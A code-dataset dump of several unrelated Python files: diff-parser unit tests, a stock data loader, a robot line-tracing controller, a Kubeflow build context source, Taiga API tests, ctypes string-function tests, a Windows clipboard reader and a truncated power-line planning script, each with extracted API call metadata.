| code (string, 22-1.05M chars) | apis (list, 1-3.31k items) | extract_api (string, 75-3.25M chars) |
|---|---|---|
#!/usr/bin/env python
import unittest
import bugzoo
from bugzoo.patch import Hunk, FilePatch, Patch
from bugzoo.util import dedent
class HunkTestCase(unittest.TestCase):
def test_read_next(self):
from_s = """
@@ -1,7 +1,6 @@
-The Way that can be told of is not the eternal Way;
-The name that can be named is not the eternal name.
The Nameless is the origin of Heaven and Earth;
-The Named is the mother of all things.
+The named is the mother of all things.
+
Therefore let there always be non-being,
so we may see their subtlety,
And let there always be being,
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
hunk = Hunk._read_next(lines)
self.assertEqual(lines, [])
self.assertEqual(str(hunk), from_s)
class FilePatchTestCase(unittest.TestCase):
def test_read_next(self):
from_s = """
diff --git a/file-two.txt b/file-two.txt
new file mode 100644
index 0000000..2990e5b
--- /dev/null
+++ b/file-two.txt
@@ -0,0 +1,2 @@
+This is file two.
+How do you do?
diff --git a/testfile.c b/testfile.c
index f50a1fc..60ed6ff 100644
--- a/testfile.c
+++ b/testfile.c
@@ -6,6 +6,8 @@
int testfun(int a, int b)
x = a + b;
x *= x;
+ int z = 10000;
+
int y;
y = x * 2;
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_l1 = lines[8:]
expected_s1 = '\n'.join(lines[3:8])
expected_s2 = '\n'.join(lines[10:])
patch = FilePatch._read_next(lines)
self.assertEqual(str(patch), expected_s1)
self.assertEqual(lines, expected_l1)
patch = FilePatch._read_next(lines)
self.assertEqual(str(patch), expected_s2)
self.assertEqual(lines, [])
class PatchTestCase(unittest.TestCase):
def test_from_unidiff(self):
from_s = """
diff --git a/file-two.txt b/file-two.txt
new file mode 100644
index 0000000..2990e5b
--- /dev/null
+++ b/file-two.txt
@@ -0,0 +1,2 @@
+This is file two.
+How do you do?
diff --git a/testfile.c b/testfile.c
index f50a1fc..60ed6ff 100644
--- a/testfile.c
+++ b/testfile.c
@@ -6,6 +6,8 @@
int testfun(int a, int b)
x = a + b;
x *= x;
+ int z = 10000;
+
int y;
y = x * 2;
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_s = \
'\n'.join(lines[3:8] + lines[10:])
patch = Patch.from_unidiff(from_s)
self.assertEqual(str(patch), expected_s)
# produced using 'svn diff'
from_s = """
Index: src/joblist.c
===================================================================
--- src/joblist.c (revision 1794)
+++ src/joblist.c (working copy)
@@ -7,7 +7,7 @@
int joblist_append(server *srv, connection *con) {
if (con->in_joblist) return 0;
- con->in_joblist = 1;
+ con->in_joblist = 10000;
if (srv->joblist->size == 0) {
srv->joblist->size = 16;
@@ -19,7 +19,7 @@
srv->joblist->ptr[srv->joblist->used++] = con;
- return 0;
+ return 3300;
}
void joblist_free(server *srv, connections *joblist) {
Index: tests/core-request.t
===================================================================
--- tests/core-request.t (revision 2792)
+++ tests/core-request.t (working copy)
@@ -246,7 +246,7 @@
ok($tf->handle_http($t) == 0, 'Content-Type - image/jpeg');
$t->{REQUEST} = ( <<EOF
- GET /image.JPG HTTP/1.0
+ GET /image.jpg HTTP/1.0
EOF
);
$t->{RESPONSE} = [ { 'HTTP-Protocol' => 'HTTP/1.0', 'HTTP-Status' => 200, 'Content-Type' => 'image/jpeg' } ];
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_s = \
'\n'.join(lines[2:22] + lines[24:])
patch = Patch.from_unidiff(from_s)
self.assertEqual(str(patch), expected_s)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"bugzoo.patch.Patch.from_unidiff",
"bugzoo.util.dedent",
"bugzoo.patch.Hunk._read_next",
"bugzoo.patch.FilePatch._read_next"
] |
[((4511, 4526), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4524, 4526), False, 'import unittest\n'), ((764, 786), 'bugzoo.patch.Hunk._read_next', 'Hunk._read_next', (['lines'], {}), '(lines)\n', (779, 786), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((1740, 1767), 'bugzoo.patch.FilePatch._read_next', 'FilePatch._read_next', (['lines'], {}), '(lines)\n', (1760, 1767), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((1881, 1908), 'bugzoo.patch.FilePatch._read_next', 'FilePatch._read_next', (['lines'], {}), '(lines)\n', (1901, 1908), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((2816, 2842), 'bugzoo.patch.Patch.from_unidiff', 'Patch.from_unidiff', (['from_s'], {}), '(from_s)\n', (2834, 2842), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((4402, 4428), 'bugzoo.patch.Patch.from_unidiff', 'Patch.from_unidiff', (['from_s'], {}), '(from_s)\n', (4420, 4428), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((692, 706), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (698, 706), False, 'from bugzoo.util import dedent\n'), ((1546, 1560), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (1552, 1560), False, 'from bugzoo.util import dedent\n'), ((2673, 2687), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (2679, 2687), False, 'from bugzoo.util import dedent\n'), ((4258, 4272), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (4264, 4272), False, 'from bugzoo.util import dedent\n')]
|
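Each `extract_api` record above appears to pair a call site in `code` with its resolved API. Below is a minimal sketch of unpacking one record; the field roles (spans, qualified name, args, alias flag, import statement) are inferred from the rows in this table, not from a documented schema.

# Field roles are inferred from the table rows; treat them as assumptions.
record = ((4511, 4526), 'unittest.main', 'unittest.main', ([], {}), '()\n',
          (4524, 4526), False, 'import unittest\n')
(call_span, qualified_api, written_name, args_kwargs, call_repr,
 args_span, import_uses_alias, import_stmt) = record
print(qualified_api)            # 'unittest.main'
print(call_span)                # (4511, 4526): character offsets into `code`
print(import_stmt.strip())      # 'import unittest'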
import pandas as pd
import torch as T
class Data:
"""
Here, we generate input data with 120 time steps, which looks into the future of 30 days.
That is, with the past 120-day data, we attempt to predict whether the return of stock will increase or decrease
after 30 days
"""
def __init__(self, dir):
self.dir = dir
self.time_step = 120
self.how_far = 30
def import_data(self):
data = pd.read_csv(self.dir)
input, target = self.preprocess(data)
input = self.reshape(input)
return input, target
def preprocess(self, data):
data = data['Adj. Close']
input = list()
target = list()
        for i in range(data.shape[0] - self.time_step - self.how_far):
            time_series = list(data.iloc[i:i + self.time_step])
            # normalize the window by its first value (a plain list does not
            # support elementwise division, so use a comprehension)
            adj_ts = [x / time_series[0] for x in time_series]
            input.append(adj_ts)
            target.append(int(data.iloc[i + self.time_step + self.how_far] / time_series[0] > adj_ts[-1]))
            if i % 500 == 0:
                print('item', str(i + 1), 'preprocessed')
return T.Tensor(input), T.Tensor(target)
def reshape(self, data):
return data.transpose(0,1).unsqueeze(2)
|
[
"pandas.read_csv",
"torch.Tensor"
] |
[((461, 482), 'pandas.read_csv', 'pd.read_csv', (['self.dir'], {}), '(self.dir)\n', (472, 482), True, 'import pandas as pd\n'), ((1133, 1148), 'torch.Tensor', 'T.Tensor', (['input'], {}), '(input)\n', (1141, 1148), True, 'import torch as T\n'), ((1150, 1166), 'torch.Tensor', 'T.Tensor', (['target'], {}), '(target)\n', (1158, 1166), True, 'import torch as T\n')]
|
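The windowing logic in `preprocess` is easier to see on a toy series. A minimal sketch with synthetic prices (the real class reads an 'Adj. Close' column from a CSV):

import numpy as np

# Synthetic, steadily rising prices stand in for the CSV column.
prices = np.linspace(100.0, 160.0, 200)
time_step, how_far = 120, 30
i = 0
window = prices[i:i + time_step]
adj_ts = window / window[0]                    # normalize by the window start
future = prices[i + time_step + how_far] / window[0]
target = int(future > adj_ts[-1])              # 1: return rises after 30 days
print(adj_ts.shape, target)                    # (120,) 1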
import etrobosim.ev3api as ev3
import etrobosim as ets
# Line-trace with P control, using the ColorSensor's reflected-light (Reflect) value.
def calcPID(r, target=20, power=70,P=1.8):
p=r-target
left=power-P*p
right=power+P*p
return (int(left),int(right))
def pidControl(initARM_count=-50,initTAIL_count=0):
left,right=calcPID(colorSensor.getBrightness())
motorL.setPWM(left)
motorR.setPWM(right)
motorARM.setPWM(initARM_count-motorARM.getCount())
motorTAIL.setPWM(initTAIL_count-motorTAIL.getCount())
#print("MotorR={},MotorL={},MotorARM={},Color={}".format(motorR.getCount(),motorL.getCount(),motorARM.getCount(),colorSensor.getBrightness()))
motorR=ev3.Motor(ev3.ePortM.PORT_B,True,ev3.MotorType.LARGE_MOTOR)
motorL=ev3.Motor(ev3.ePortM.PORT_C,True,ev3.MotorType.LARGE_MOTOR)
motorARM=ev3.Motor(ev3.ePortM.PORT_A,True,ev3.MotorType.MEDIUM_MOTOR)
motorTAIL=ev3.Motor(ev3.ePortM.PORT_D,True,ev3.MotorType.LARGE_MOTOR)
motorR.reset()
motorL.reset()
colorSensor=ev3.ColorSensor(ev3.ePortS.PORT_2)
try:
controller=ets.Controller(ets.Course.LEFT)
controller.addHandlers([motorR,motorL,motorARM,motorTAIL,colorSensor])
controller.start(debug=True)
controller.runCyclic(pidControl)
controller.exit_process()
except KeyboardInterrupt:
controller.exit_process()
pass
|
[
"etrobosim.ev3api.Motor",
"etrobosim.ev3api.ColorSensor",
"etrobosim.Controller"
] |
[((651, 712), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_B', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_B, True, ev3.MotorType.LARGE_MOTOR)\n', (660, 712), True, 'import etrobosim.ev3api as ev3\n'), ((718, 779), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_C', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_C, True, ev3.MotorType.LARGE_MOTOR)\n', (727, 779), True, 'import etrobosim.ev3api as ev3\n'), ((787, 849), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_A', '(True)', 'ev3.MotorType.MEDIUM_MOTOR'], {}), '(ev3.ePortM.PORT_A, True, ev3.MotorType.MEDIUM_MOTOR)\n', (796, 849), True, 'import etrobosim.ev3api as ev3\n'), ((858, 919), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_D', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_D, True, ev3.MotorType.LARGE_MOTOR)\n', (867, 919), True, 'import etrobosim.ev3api as ev3\n'), ((960, 994), 'etrobosim.ev3api.ColorSensor', 'ev3.ColorSensor', (['ev3.ePortS.PORT_2'], {}), '(ev3.ePortS.PORT_2)\n', (975, 994), True, 'import etrobosim.ev3api as ev3\n'), ((1016, 1047), 'etrobosim.Controller', 'ets.Controller', (['ets.Course.LEFT'], {}), '(ets.Course.LEFT)\n', (1030, 1047), True, 'import etrobosim as ets\n')]
|
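The proportional steering in `calcPID` can be checked with a few hypothetical brightness readings (target 20, base power 70, gain 1.8):

# Standalone copy of the proportional law above, for a quick sanity check.
def calc_pid(r, target=20, power=70, P=1.8):
    p = r - target                     # brightness error
    return int(power - P * p), int(power + P * p)

for reading in (20, 30, 10):           # on target / too bright / too dark
    print(reading, calc_pid(reading))
# 20 -> (70, 70), 30 -> (52, 88), 10 -> (88, 52): power shifts to steer back onto the line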
from kubernetes import client
from kubeflow.fairing.builders.cluster.context_source import ContextSourceInterface
from kubeflow.fairing.cloud import ibm_cloud
from kubeflow.fairing import utils
from kubeflow.fairing.constants import constants
class COSContextSource(ContextSourceInterface):
"""
IBM Cloud Object Storage Context Source.
:param namespace: namespace that IBM COS credential secret created in.
:param region: region name, default to us-geo
:param cos_endpoint_url: IBM COS endpoint url, such as "https://s3..."
"""
def __init__(self, namespace=None, region='us-geo',
cos_endpoint_url=constants.IBM_COS_DEFAULT_ENDPOINT):
self.cos_endpoint_url = cos_endpoint_url
self.region = region
self.namespace = namespace or utils.get_default_target_namespace()
self.aws_access_key_id, self.aws_secret_access_key =\
ibm_cloud.get_ibm_cos_credentials(namespace)
def prepare(self, context_filename): # pylint: disable=arguments-differ
"""
:param context_filename: context filename
"""
self.uploaded_context_url = self.upload_context(context_filename)
def upload_context(self, context_filename):
"""
:param context_filename: context filename
"""
cos_uploader = ibm_cloud.COSUploader(
self.namespace,
self.cos_endpoint_url
)
context_hash = utils.crc(context_filename)
bucket_name = 'kubeflow-' + context_hash.lower()
return cos_uploader.upload_to_bucket(blob_name='fairing-builds/' +
context_hash,
bucket_name=bucket_name,
file_to_upload=context_filename)
def generate_pod_spec(self, image_name, push): # pylint: disable=arguments-differ
"""
:param image_name: name of image to be built
:param push: whether to push image to given registry or not
"""
args = [
"--dockerfile=Dockerfile",
"--destination=" + image_name,
"--context=" + self.uploaded_context_url
]
if not push:
args.append("--no-push")
return client.V1PodSpec(
containers=[
client.V1Container(
name='kaniko',
image=constants.KANIKO_IMAGE,
args=args,
env=[
client.V1EnvVar(name='AWS_REGION',
value=self.region),
client.V1EnvVar(name='AWS_ACCESS_KEY_ID',
value=self.aws_access_key_id),
client.V1EnvVar(name='AWS_SECRET_ACCESS_KEY',
value=self.aws_secret_access_key),
client.V1EnvVar(name='S3_ENDPOINT',
value=self.cos_endpoint_url),
],
volume_mounts=[
client.V1VolumeMount(name="docker-config",
mount_path="/kaniko/.docker/")
]
)
],
restart_policy='Never',
volumes=[
client.V1Volume(name="docker-config",
config_map=client.V1ConfigMapVolumeSource(
name="docker-config"))
])
def cleanup(self):
# TODO(@jinchihe)
pass
|
[
"kubernetes.client.V1EnvVar",
"kubeflow.fairing.cloud.ibm_cloud.COSUploader",
"kubeflow.fairing.utils.crc",
"kubeflow.fairing.cloud.ibm_cloud.get_ibm_cos_credentials",
"kubernetes.client.V1ConfigMapVolumeSource",
"kubernetes.client.V1VolumeMount",
"kubeflow.fairing.utils.get_default_target_namespace"
] |
[((908, 952), 'kubeflow.fairing.cloud.ibm_cloud.get_ibm_cos_credentials', 'ibm_cloud.get_ibm_cos_credentials', (['namespace'], {}), '(namespace)\n', (941, 952), False, 'from kubeflow.fairing.cloud import ibm_cloud\n'), ((1325, 1385), 'kubeflow.fairing.cloud.ibm_cloud.COSUploader', 'ibm_cloud.COSUploader', (['self.namespace', 'self.cos_endpoint_url'], {}), '(self.namespace, self.cos_endpoint_url)\n', (1346, 1385), False, 'from kubeflow.fairing.cloud import ibm_cloud\n'), ((1444, 1471), 'kubeflow.fairing.utils.crc', 'utils.crc', (['context_filename'], {}), '(context_filename)\n', (1453, 1471), False, 'from kubeflow.fairing import utils\n'), ((797, 833), 'kubeflow.fairing.utils.get_default_target_namespace', 'utils.get_default_target_namespace', ([], {}), '()\n', (831, 833), False, 'from kubeflow.fairing import utils\n'), ((3444, 3496), 'kubernetes.client.V1ConfigMapVolumeSource', 'client.V1ConfigMapVolumeSource', ([], {'name': '"""docker-config"""'}), "(name='docker-config')\n", (3474, 3496), False, 'from kubernetes import client\n'), ((2525, 2578), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_REGION"""', 'value': 'self.region'}), "(name='AWS_REGION', value=self.region)\n", (2540, 2578), False, 'from kubernetes import client\n'), ((2644, 2715), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_ACCESS_KEY_ID"""', 'value': 'self.aws_access_key_id'}), "(name='AWS_ACCESS_KEY_ID', value=self.aws_access_key_id)\n", (2659, 2715), False, 'from kubernetes import client\n'), ((2781, 2860), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_SECRET_ACCESS_KEY"""', 'value': 'self.aws_secret_access_key'}), "(name='AWS_SECRET_ACCESS_KEY', value=self.aws_secret_access_key)\n", (2796, 2860), False, 'from kubernetes import client\n'), ((2926, 2990), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""S3_ENDPOINT"""', 'value': 'self.cos_endpoint_url'}), "(name='S3_ENDPOINT', value=self.cos_endpoint_url)\n", (2941, 2990), False, 'from kubernetes import client\n'), ((3115, 3188), 'kubernetes.client.V1VolumeMount', 'client.V1VolumeMount', ([], {'name': '"""docker-config"""', 'mount_path': '"""/kaniko/.docker/"""'}), "(name='docker-config', mount_path='/kaniko/.docker/')\n", (3135, 3188), False, 'from kubernetes import client\n')]
|
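The kaniko argument assembly inside `generate_pod_spec` can be exercised on its own; the image name and context URL below are placeholders, not real endpoints:

# Isolated version of the argument list built in generate_pod_spec above.
def kaniko_args(image_name, context_url, push=True):
    args = [
        "--dockerfile=Dockerfile",
        "--destination=" + image_name,
        "--context=" + context_url,
    ]
    if not push:
        args.append("--no-push")
    return args

print(kaniko_args("registry.example.com/app:latest",
                  "s3://kubeflow-abc123/fairing-builds/abc123", push=False))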
from taiga.requestmaker import RequestMaker
from taiga.models import User, Project
from taiga import TaigaAPI
import unittest
from mock import patch
from .tools import create_mock_json
from .tools import MockResponse
class TestUsers(unittest.TestCase):
@patch('taiga.requestmaker.RequestMaker.get')
def test_starred_projects(self, mock_requestmaker_get):
mock_requestmaker_get.return_value = MockResponse(
200, create_mock_json('tests/resources/starred_projects.json')
)
rm = RequestMaker('/api/v1', 'fakehost', 'faketoken')
user = User(rm, id=1)
projects = user.starred_projects()
self.assertEqual(len(projects), 2)
self.assertTrue(isinstance(projects[0], Project))
self.assertTrue(isinstance(projects[1], Project))
@patch('taiga.requestmaker.RequestMaker.get')
def test_list_all_users(self, mock_requestmaker_get):
mock_requestmaker_get.return_value = MockResponse(200,
create_mock_json('tests/resources/projects_list_success.json'))
api = TaigaAPI(token='<PASSWORD>')
users = api.users.list()
self.assertEqual(len(users), 1)
self.assertTrue(isinstance(users[0], User))
@patch('taiga.models.Users.get')
def test_me(self, mock_user_get):
rm = RequestMaker('/api/v1', 'fakehost', 'faketoken')
mock_user_get.return_value = User(rm, full_name='Andrea')
api = TaigaAPI(token='<PASSWORD>')
user = api.me()
self.assertEqual(user.full_name, 'Andrea')
|
[
"taiga.TaigaAPI",
"mock.patch",
"taiga.requestmaker.RequestMaker",
"taiga.models.User"
] |
[((261, 305), 'mock.patch', 'patch', (['"""taiga.requestmaker.RequestMaker.get"""'], {}), "('taiga.requestmaker.RequestMaker.get')\n", (266, 305), False, 'from mock import patch\n'), ((811, 855), 'mock.patch', 'patch', (['"""taiga.requestmaker.RequestMaker.get"""'], {}), "('taiga.requestmaker.RequestMaker.get')\n", (816, 855), False, 'from mock import patch\n'), ((1227, 1258), 'mock.patch', 'patch', (['"""taiga.models.Users.get"""'], {}), "('taiga.models.Users.get')\n", (1232, 1258), False, 'from mock import patch\n'), ((523, 571), 'taiga.requestmaker.RequestMaker', 'RequestMaker', (['"""/api/v1"""', '"""fakehost"""', '"""faketoken"""'], {}), "('/api/v1', 'fakehost', 'faketoken')\n", (535, 571), False, 'from taiga.requestmaker import RequestMaker\n'), ((587, 601), 'taiga.models.User', 'User', (['rm'], {'id': '(1)'}), '(rm, id=1)\n', (591, 601), False, 'from taiga.models import User, Project\n'), ((1067, 1095), 'taiga.TaigaAPI', 'TaigaAPI', ([], {'token': '"""<PASSWORD>"""'}), "(token='<PASSWORD>')\n", (1075, 1095), False, 'from taiga import TaigaAPI\n'), ((1310, 1358), 'taiga.requestmaker.RequestMaker', 'RequestMaker', (['"""/api/v1"""', '"""fakehost"""', '"""faketoken"""'], {}), "('/api/v1', 'fakehost', 'faketoken')\n", (1322, 1358), False, 'from taiga.requestmaker import RequestMaker\n'), ((1396, 1424), 'taiga.models.User', 'User', (['rm'], {'full_name': '"""Andrea"""'}), "(rm, full_name='Andrea')\n", (1400, 1424), False, 'from taiga.models import User, Project\n'), ((1439, 1467), 'taiga.TaigaAPI', 'TaigaAPI', ([], {'token': '"""<PASSWORD>"""'}), "(token='<PASSWORD>')\n", (1447, 1467), False, 'from taiga import TaigaAPI\n')]
|
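For reference, the decorator pattern these tests rely on, in a self-contained form; `unittest.mock` is the stdlib equivalent of the external `mock` package used above:

import os
import unittest
from unittest.mock import patch

class PatchExample(unittest.TestCase):
    @patch('os.getcwd')
    def test_patched(self, mock_getcwd):
        # patch() replaces os.getcwd for the test's duration and passes
        # the mock in as an extra positional argument.
        mock_getcwd.return_value = '/fake/dir'
        self.assertEqual(os.getcwd(), '/fake/dir')

if __name__ == '__main__':
    unittest.main()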
#!/usr/bin/env python3
from ctypes import *
import sys
loader = cdll.LoadLibrary
lib = loader("../bin/util.so")
def testreverse():
successCount = 0
failCount = 0
dm=["43434fffdsfasf",
"sdfsadfsdff",
"dfsadfsdfasdfasdfsdfasdfasdfasdfsdfsdf",
"r3rednhdfvhfijdsbhnjhjfhikjhuiijuiwu87439",
"",
"dfasdfa12323",
"1111111234567900009876545678765445",
"0000000000",
"11111",
"2222",
"1a1",
"22sss"
]
lib.reverse.restype = c_char_p
for i in dm:
l=c_char_p(str.encode(i))
ret=lib.reverse(l)
if ret.decode()==i[::-1]:
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testctoi():
successCount = 0
failCount = 0
dm=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
lib.ctoi.restype = c_int
for i in dm:
c=c_char(str.encode(i))
ret=lib.ctoi(c)
# print("testctoi:",ret)
if ret==int(i,16):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testitoc():
successCount = 0
failCount = 0
dm=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
lib.itoc.restype = c_char
for i in dm:
ret=lib.itoc(i, 16)
if i == int(ret, 16):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testlstrip():
successCount = 0
failCount = 0
dm=[" 43434fffdsfasf",
"sdfsadfsdff ",
"dfsadfsdf asdfasdfsdfasdfasdfasdfsdfsdf",
"r3rednhdfvhf ijdsbhnjhjfhikjhuiijuiwu87439",
"",
" ",
" dfasdfa12323 ",
"1111111234567900009876545678765445",
"0000000000",
"11111",
"2222",
"1a1",
"22sss "
]
lib.lstrip.restype = c_char_p
for i in dm:
l=c_char_p(str.encode(i))
c=c_char(str.encode("a"))
ret=lib.lstrip(l, c)
if ret.decode() == i.lstrip("a"):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testrpad():
successCount = 0
failCount = 0
dm=[("abcdef", "c", 7),
("abcdef", "0", 0),
("abcdef", "0", 1),
("abcdef", "0", 100),
]
lib.rpad.restype = c_char_p
    for i in dm:
        # use a writable buffer for the destination; a c_char_p over an
        # immutable bytes object must not be written to by the C side
        dest = create_string_buffer(i[2] + 1)
        src = c_char_p(str.encode(i[0]))
        c = c_char(str.encode(i[1]))
        n = c_int(i[2])  # avoid shadowing the builtin len
        ret = lib.rpad(dest, src, c, n)
if ret.decode() == i[0].ljust(i[2], i[1]):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print("ret:", ret.decode())
print("expect:", i[0].ljust(i[2], i[1]))
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
#'''
testreverse()
testctoi()
testitoc()
testlstrip()
#'''
testrpad()
|
[
"sys._getframe"
] |
[((763, 778), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (776, 778), False, 'import sys\n'), ((1246, 1261), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1259, 1261), False, 'import sys\n'), ((1647, 1662), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1660, 1662), False, 'import sys\n'), ((2470, 2485), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (2483, 2485), False, 'import sys\n'), ((3205, 3220), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (3218, 3220), False, 'import sys\n')]
|
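The `restype` assignments above are essential: ctypes assumes every foreign function returns a C int unless told otherwise. A self-contained illustration against libc (POSIX only), since `../bin/util.so` isn't available here:

import ctypes

libc = ctypes.CDLL(None)                       # POSIX: the already-loaded C library
libc.strchr.restype = ctypes.c_char_p          # declare the char* return type
libc.strchr.argtypes = [ctypes.c_char_p, ctypes.c_int]
print(libc.strchr(b"hello", ord("e")))          # b'ello'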
"""Try to read Windows clipboard text"""
import ctypes
CF_TEXT = 1
KERNEL32 = ctypes.windll.kernel32
USER32 = ctypes.windll.user32
def get_clipboard_text():
"""Get Windows clipboard text using WinAPI functions"""
USER32.OpenClipboard(0)
text = None
if USER32.IsClipboardFormatAvailable(CF_TEXT):
data = USER32.GetClipboardData(CF_TEXT)
data_locked = KERNEL32.GlobalLock(data)
        text = ctypes.c_char_p(data_locked).value
        KERNEL32.GlobalUnlock(data_locked)
    # close the clipboard before returning; the early return that used to sit
    # here skipped CloseClipboard and leaked the clipboard handle
    USER32.CloseClipboard()
    if not text:
        raise Exception('No text in clipboard')
    return text
if __name__ == '__main__':
print(get_clipboard_text())
|
[
"ctypes.c_char_p"
] |
[((431, 459), 'ctypes.c_char_p', 'ctypes.c_char_p', (['data_locked'], {}), '(data_locked)\n', (446, 459), False, 'import ctypes\n')]
|
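A variant of the function above with try/finally, so `CloseClipboard` runs even when reading raises; it uses only names already defined in this file:

def get_clipboard_text_safe():
    """Like get_clipboard_text, but guarantees the clipboard is closed."""
    USER32.OpenClipboard(0)
    try:
        if not USER32.IsClipboardFormatAvailable(CF_TEXT):
            raise Exception('No text in clipboard')
        data = USER32.GetClipboardData(CF_TEXT)
        data_locked = KERNEL32.GlobalLock(data)
        try:
            return ctypes.c_char_p(data_locked).value
        finally:
            KERNEL32.GlobalUnlock(data_locked)
    finally:
        USER32.CloseClipboard()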
import argparse
import os
import pickle
import time
# import warnings
import numpy as np
from power_planner.utils.utils import get_distance_surface
from csv import writer
import warnings
import matplotlib.pyplot as plt
# utils imports
from power_planner.utils.utils_ksp import KspUtils
from power_planner.utils.utils_costs import CostUtils
from power_planner.evaluate_path import save_path_cost_csv
from power_planner import graphs
def logging(
ID, graph, path, path_costs, cfg, N_EDGES, time_pipeline, comp_path=None
):
if comp_path is None:
max_eucl = 0
mean_eucl = 0
else:
# compute path distances and multiply with resolution to get meters
max_eucl = (
KspUtils.path_distance(path, comp_path, mode="eucl_max") *
cfg.scale * 10
)
mean_eucl = (
KspUtils.path_distance(path, comp_path, mode="eucl_mean") *
cfg.scale * 10
)
# SAVE timing test
angle_cost = round(np.sum(CostUtils.compute_angle_costs(path)), 2)
n_categories = len(cfg.class_weights)
path_costs = np.asarray(path_costs)
summed_costs = np.around(np.sum(path_costs[:, -n_categories:], axis=0), 2)
weighted_sum = round(np.dot(summed_costs, cfg.class_weights), 2)
n_pixels = np.sum(belgium_inst_corr > 0)
# csv_header = ["ID", "instance", "resolution", "graph", "number pixels"
# "space edges", "overall time",
# "time vertex adding", "time edge adding", "time shortest path",
# "angle cost", "category costs", "sum of costs"]
logs = [
ID, INST, SCALE_PARAM * 10, n_pixels, graphtype, graph.n_nodes,
N_EDGES, time_pipeline, graph.time_logs["add_nodes"],
graph.time_logs["add_all_edges"], graph.time_logs["shortest_path"],
cfg.angle_weight, angle_cost, summed_costs, weighted_sum, mean_eucl,
max_eucl
]
with open(cfg.csv_times, 'a+', newline='') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add contents of list as last row in the csv file
csv_writer.writerow(logs)
parser = argparse.ArgumentParser()
parser.add_argument('-cluster', action='store_true')
parser.add_argument('-i', '--instance', type=str, default="ch")
parser.add_argument('-s', '--scale', help="resolution", type=int, default=1)
args = parser.parse_args()
# define out save name
# ID = "results_" + args.instance # str(round(time.time() / 60))[-5:]
OUT_DIR = os.path.join("..", "outputs")
SCALE_PARAM = args.scale
SCENARIO = 1
INST = args.instance
height_resistance_path = None # "../data/Instance_CH.nosync/dtm_10m.tif"
PIPELINE = [(1, 0)]
USE_KSP = 0
GRAPH_TYPE = graphs.ImplicitLG
# LineGraph, WeightedGraph, RandomWeightedGraph, RandomLineGraph, ImplicitLG
# ImplicitLgKSP, WeightedKSP
print("graph type:", GRAPH_TYPE)
# summarize: mean/max/min, remove: all/surrounding, sample: simple/watershed
NOTES = "None" # "mean-all-simple"
# define IO paths
PATH_FILES = "data"
# PIPE = [(MAX_EDGES, D1), (MAX_EDGES, D2), (MAX_EDGES, 0)]
PIPELINES = [[1], [2, 1], [4, 2, 1], [3, 1]]
print("PIPELINES:", PIPELINES)
mult_factor = 13
random = 0
graph_names = ["Normal graph", "Implicit line graph", "Line graph"]
for INST, SCALE_PARAM in zip(["belgium", "de", "ch"], [1, 2, 2]):
print("")
print("---------------------------------------------------")
print(INST, SCALE_PARAM)
# LOAD DATA
IOPATH = os.path.join(
PATH_FILES, f"{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat"
)
with open(IOPATH, "rb") as infile:
data = pickle.load(infile)
(
belgium_inst, belgium_edge_inst, belgium_inst_corr, belgium_config
) = data
cfg = belgium_config.graph
start_inds = belgium_config.graph.start_inds
dest_inds = belgium_config.graph.dest_inds
# iterate over pipelines
ground_truth_paths = [[], []]
for pipe_kind, PIPE in enumerate(PIPELINES):
ID = str(PIPE)
print("------------- NEW PIPELINE ", PIPE, "-----------------------")
for g, GRAPH in enumerate([graphs.WeightedGraph, graphs.ImplicitLG]):
print("")
print(GRAPH)
print("")
graphtype = graph_names[g]
graph = GRAPH(belgium_inst, belgium_inst_corr, verbose=False)
corridor = np.ones(belgium_inst_corr.shape) * 0.5
tic = time.time()
actual_pipe = []
edge_numbers = []
for pipe_step, factor in enumerate(PIPE):
if random:
